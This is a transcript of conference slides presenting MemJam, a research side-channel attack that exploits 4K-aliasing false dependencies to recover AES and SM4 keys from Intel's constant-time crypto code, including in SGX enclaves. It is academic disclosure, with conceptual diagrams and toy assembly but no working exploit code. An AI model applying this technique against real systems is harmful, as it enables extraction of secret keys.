attack against constant time
play

ATTACK AGAINST CONSTANT-TIME CRYPTO IMPLEMENTATIONS IN SGX Daniel - PowerPoint PPT Presentation

#RSAC SESSION ID: CRYP-T07 MEMJAM: A FALSE DEPENDENCY ATTACK AGAINST CONSTANT-TIME CRYPTO IMPLEMENTATIONS IN SGX Daniel Moghimi Ph.D. Student Worcester Polytechnic Institute @danielmgmi MemJam: A False Dependency Attack against


  1. #RSAC SESSION ID: CRYP-T07 MEMJAM: A FALSE DEPENDENCY ATTACK AGAINST CONSTANT-TIME CRYPTO IMPLEMENTATIONS IN SGX Daniel Moghimi Ph.D. Student Worcester Polytechnic Institute @danielmgmi

  2. MemJam: A False Dependency Attack against Constant-Time Crypto Implementations in SGX Ahmad “Daniel” Moghimi Thomas Eisenbarth Berk Sunar April 17, 2018 CT-RSA 2018 - San Francisco, CA

  3. Data Dependency • Data dependency: Instruction  Data of a preceding instruction add %ebx, %eax 1 sub %eax, %edx 2 xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 3

  4. Data Dependency – Pipelined Execution • Data dependency: Instruction  Data of a preceding instruction add %ebx, %eax 1 sub %eax, %edx 2 xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 4

  5. Data Dependency – Pipelined Execution • Data dependency: Instruction  Data of a preceding instruction add %ebx, %eax 1 IF sub %eax, %edx 2 xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 5

  6. Data Dependency – Pipelined Execution • Data dependency: Instruction  Data of a preceding instruction add %ebx, %eax 1 IF ID sub %eax, %edx 2 IF xor %ecx, %ecx 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 6

  7. Data Dependency – Pipelined Execution • Data dependency: Instruction  Data of a preceding instruction add %ebx, %eax 1 IF ID EX sub %eax, %edx 2 IF ID xor %ecx, %ecx IF 3 add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 7

  8. Data Dependency – Pipelined Execution • Data dependency: Instruction  Data of a preceding instruction add %ebx, %eax 1 IF ID EX WB sub %eax, %edx 2 IF ID EX xor %ecx, %ecx IF ID 3 IF add %eax, %edi 4 sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 8

  9. Data Dependency – Pipelined Execution • Data dependency: Instruction  Data of a preceding instruction add %ebx, %eax 1 IF ID EX WB sub %eax, %edx 2 IF ID EX EX WB xor %ecx, %ecx IF ID 3 EX WB EX WB IF ID add %eax, %edi 4 EX WB IF ID sub %ecx, %edi 5 Instruction Fetch IF Instruction Decode ID Execute EX Write Back WB 9

  10. Data False Dependency • Pipeline stalls without true dependency. • Reasons: • Register Reuse • Limited Address Space add %ebx, %eax 1 xor %ecx, %ecx 2 sub %eax, %edx 3 mov $100, %edx 4 FD sub %edx, %ecx 5 10

  11. Data False Dependency – Register Renaming • Pipeline stalls without true dependency. • Reasons: • Register Reuse • Limited Address Space add %ebx, %eax add %ebx, %eax 1 1 xor %ecx, %ecx 2 xor %ecx, %ecx 2 Register sub %eax, %edx sub %eax, %edx 3 3 Renaming mov $100, %edx 4 mov $100, %bat 4 FD sub %edx, %ecx 5 sub %bat, %ecx 5 11

  12. Memory ry False Dependency – 4K Aliasing • Memory loads/stores are executed out of order and speculatively. • The dependency is verified after the execution! mov %eax, (%ebx) Execute Execute Store Load Store mov ( %ecx), %edx Load Dependent? Yes • 4K Aliasing: Addresses that are 4K apart are assumed dependent. • Re-execute the load and corresponding instructions due to false dependency. • Virtual-to-physical address translation  Memory disambiguation 12

  13. 4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Load 0xFECD1 13

  14. 4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Load 0xFECD1 Load 0xFECD2 Load 0xFECD3 Load 0xFECD4 Load 0xFECD5 Load 0xFECD6 Load 0xFECD7 Load 0xFECD8 14

  15. 4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Load 0xFECD1 Load 0xFECD2 Execute & Time Load 0xFECD3 Load 0xFECD4 Load 0xFECD5 Load 0xFECD6 Load 0xFECD7 Load 0xFECD8 15

  16. 4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Store 0x12ABCDEF Load 0xFECD1 Store 0x12ABCDEF Load 0xFECD2 Execute & Time Store 0x12ABCDEF Load 0xFECD3 Store 0x12ABCDEF Load 0xFECD4 Store 0x12ABCDEF Load 0xFECD5 Store 0x12ABCDEF Load 0xFECD6 Store 0x12ABCDEF Load 0xFECD7 Store 0x12ABCDEF Load 0xFECD8 Store 0x12ABCDEF Store 0x12ABCDEF 16

  17. 4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Store 0x12ABC200 Load 0xFECD1 Store 0x12ABC200 Load 0xFECD2 Execute & Time Store 0x12ABC200 Load 0xFECD3 Store 0x12ABC200 Load 0xFECD4 Store 0x12ABC200 Load 0xFECD5 Store 0x12ABC200 Load 0xFECD6 Store 0x12ABC200 Load 0xFECD7 Store 0x12ABC200 Load 0xFECD8 Store 0x12ABC200 Store 0x12ABC200 17

  18. 4K Aliasing – Hyperthreading Core HT – Thread A HT – Thread B Store 0x12ABC Load 0xFECD1 Store 0x12ABC Load 0xFECD2 Execute & Time Store 0x12ABC Load 0xFECD3 Store 0x12ABC Load 0xFECD4 Store 0x12ABC Load 0xFECD5 Store 0x12ABC Load 0xFECD6 Store 0x12ABC Load 0xFECD7 Store 0x12ABC Load 0xFECD8 Store 0x12ABC Store 0x12ABC 18

  19. MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) 19

  20. MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks 20

  21. MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks L2/LLC Cache Attacks 21

  22. MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks L2/LLC Cache Attacks 2005 – 2006 – Percival – 2015 – Irazoqui Osvik – Cache – S $ A Cache 2014 – Yarom – Missing for Flush+Reload attacks Fun 22

  23. MemJam – In Intra Cache Lin ine Resolution Least 12 bits (Virtual Address = Physical Address) Rest of the bits (Virtual != Physical) L1 Cache Attacks L2/LLC Cache Attacks • Intra-cache line Leakage (4-byte granularity) • Higher time correlates  Memory accesses with the same bit 3 to 12 • 4 bits of intra-cache level leakage 23

  24. MemJam Attack CPU Core Core HT HT HT HT Encryption Service 24

  25. MemJam Attack CPU Core Core HT HT HT HT Encryption Service 25

  26. MemJam Attack CPU Core Core HT HT HT HT Encryption Service 26

  27. MemJam Attack CPU Core Core HT HT HT HT Execute load compute load load compute load compute load load Encryption Service 27

  28. MemJam Attack CPU Core Core HT HT HT HT Execute load compute load load compute load compute load load Encryption Service 28

  29. MemJam Attack CPU Core Core HT HT HT HT Execute load compute Execute Again load load compute load compute load load Encryption Service 29

  30. MemJam Attack CPU Core Core HT HT HT HT Execute load compute Execute Again load load compute load compute load load Encryption Service 30

  31. MemJam Attack CPU Core Core HT HT HT HT Execute load compute Execute Again load load compute load Higher time if compute there are more load number of 4K load Encryption conflicts Service 31

  32. Constant tim ime AES – Safe2Encry rypt_RIJ128 • Scatter-gather implementation of AES • 256 S-Box – 4 Cache Line • Cache independent access pattern • Implemented and distributed as part of Intel products • Intel SGX Linux Software Development Kit (SDK) • Intel IPP Cryptography Library 64 Bytes 4 Cache Lines A LINE 2 B LINE 2 C LINE 2 D LINE 2 S-Box Lookup 32

  33. Constant tim ime AES – Safe2Encry rypt_RIJ128 • Scatter-gather implementation of AES • 256 S-Box – 4 Cache Line • Cache independent access pattern • Implemented and distributed as part of Intel products • Intel SGX Linux Software Development Kit (SDK) • Intel IPP Cryptography Library 64 Bytes 4 Cache Lines A LINE 2 B LINE 2 C LINE 2 D LINE 2 A B C D S-Box Lookup Local Buffer 33

  34. Constant tim ime AES – Safe2Encry rypt_RIJ128 • Scatter-gather implementation of AES • 256 S-Box – 4 Cache Line • Cache independent access pattern • Implemented and distributed as part of Intel products • Intel SGX Linux Software Development Kit (SDK) • Intel IPP Cryptography Library 64 Bytes 4 Cache Lines A LINE 2 B LINE 2 C LINE 2 D LINE 2 A B C D B S-Box Lookup Local Buffer 34

  35. MemJam Attack on AES 64 Bytes LINE 2 LINE 2 4 Cache Lines LINE 2 LINE 2 35

  36. MemJam Attack on AES 64 Bytes LINE 2 LINE 2 4 Cache Lines LINE 2 LINE 2 36

  37. MemJam Attack on AES 64 Bytes LINE 2 LINE 2 4 Cache Lines LINE 2 LINE 2 37

  38. MemJam Attack on AES 64 Bytes LINE 2 4 Cache Lines 38

  39. MemJam Attack on AES 64 Bytes LINE 2 4 Cache Lines 39

  40. AES Key Recovery ry 40

  41. AES Key Recovery ry 41

  42. SM4 Blo lock cip ipher – cpSMS4_Cipher • Standard Cipher support by Intel • Chinese National Standard for Wireless LAN WAPI • S-Box + Unbalanced Feistel Structure • Protected by Cache State Normalization • Recursive attack  Full key recovery with 40K observations 42

  43. MemJaming In Intel SGX Secure Enclave CPU Core Core HT HT HT HT Execute load Intel SGX compute Execute Again Enclave load load compute load Higher time if compute there are more load number of 4K load Encryption conflicts Service 43

Recommend


More recommend